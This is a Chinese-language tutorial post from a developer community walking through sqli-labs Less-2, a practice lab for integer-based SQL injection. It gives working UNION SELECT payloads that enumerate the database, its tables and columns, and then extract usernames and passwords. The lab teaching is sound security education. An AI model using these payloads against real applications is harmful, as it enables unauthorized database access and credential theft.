备案控制台

开发者社区安全文章正文

sqli-lab教程Less-2

2024-01-25 47

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： sqli-lab教程Less-2

less-2

sqli-lab通过各种方式（整型注入，字符注入，布尔盲注，时间盲注，堆叠注入…）爆出库表字段拿到字段值。

学习sqli注入必备语句：

查库：select schema_name from information_schema.schemata

查表：select table_name from information_schema.tables where table_schema=‘security’（此处拿security库为例）

查字段：select column_name from information_schema.columns where table_name=‘users’（此处拿users表例）

查字段的值：select username,password from security.users（此处拿username，password字段为例）

1.加单引号看出，此处是整形注入

2.使用order by语句判断列数，3列回显正确，说明有三列

3.使用union select联合查询，把id改成一个不存在的值使得有回显位

?id=-1 union select 1,2,3

4.进行爆库操作

?id=-1 union select 1,2,database()

5.进行爆表操作

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

group_concat：将所有的数据连接进行拼接后作为一行显示

where：指定库的位置

6.进行爆字段操作

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

7.进行爆字段值操作

?id=-1 union select 1,2,group_concat(concat_ws('~',username,password)) from security.users

concat_ws(’~’,A,B)

显示为(A~B)，用于区分用户名、密码

注入完成！这是方法之一，后期会出sqlmap工具等教程…

文章标签：

安全

数据安全/隐私保护

Brucye

目录

相关文章

Brucye

|

6月前

|

安全

sqli-lab教程Less-9

sqli-lab教程Less-9

Brucye

67 0 0

Brucye

|

6月前

|

关系型数据库 MySQL Shell

sqli-lab教程Less-7

sqli-lab教程Less-7

Brucye

88 0 0

Brucye

|

6月前

|

安全

sqli-lab教程Less-8

sqli-lab教程Less-8

Brucye

74 0 0

Brucye

|

6月前

|

安全数据安全/隐私保护

sqli-lab教程Less-5

sqli-lab教程Less-5

Brucye

70 0 0

Brucye

|

6月前

|

安全数据安全/隐私保护

sqli-lab教程Less-4

sqli-lab教程Less-4

Brucye

41 0 0

Brucye

|

6月前

|

安全关系型数据库 MySQL

sqli-lab学习笔记

sqli-lab学习笔记

Brucye

36 0 0

不拿flag不改名

|

6月前

|

安全数据库数据安全/隐私保护

sqli-labs---第三关

sqli-labs---第三关

不拿flag不改名

51 1 1

游客h2vchmlwqitbk

|

5月前

|

数据安全/隐私保护

【less-3】sqli-labs靶场第三关

【less-3】sqli-labs靶场第三关

游客h2vchmlwqitbk

38 0 0

XError＿xiaoyu

|

6月前

|

SQL PHP 数据库

Sqli-labs靶场搭建

本文章是在自己在使用新版phpstudy搭建靶场过程中遇到了很多问题,但在查询无果后,决定尝试旧版的phpstudy看能否成功,很幸运,成功了,也并不是网上的教程,说是php必须在5.2及以下.我使用的是5.4版本的.是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养

XError＿xiaoyu

84 1 1

sumith

|

6月前

|

PHP

8、sqli-labs环境

8、sqli-labs环境

sumith

40 1 1

热门文章

最新文章

Flink SQL 实战：双流 join 场景应用

Webpack构建library时的踩坑经历

《UVM实战》——3.3节field automation机制

关于规则引擎的选型和疑惑思考

线性排序算法（1）

数据泵 TTS（传输表空间技术）

新用户来自哪里新用户因何而来

NYOJ714-Card Trick

RMAN简明教程之二——RMAN的启动与运行

“单播”、“组播”和“多播”

VideoChat：高效学习新神器！一键解读音视频内容，结合 AI 生成总结内容、思维导图和智能问答

《C++巧筑智能框架根基：开启 AI 开发新航道》

《跨越语言壁垒：Python 人工智能原型到 C++可执行程序的转型之路》

Go语言中json序列化的一个小坑，建议多留意一下

JVM常见面试题（四）：垃圾回收

C语言物联网开发之设备安全与代码可靠性隐患

C语言物联网开发之设备安全与代码可靠性隐患

C 语言物联网开发之网络通信与数据传输难题

Linux服务器安全

Web应用防火墙（WAF）与数据库应用防火墙有什么区别？

相关电子书

更多

低代码开发师（初级）实战教程

冬季实战营第三期：MySQL数据库进阶实战

阿里巴巴DevOps 最佳实践手册

下一篇

无影云桌面